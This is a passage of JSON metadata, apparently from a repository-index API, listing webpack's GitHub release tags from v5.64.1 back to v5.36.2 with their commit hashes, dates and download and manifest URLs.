ack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G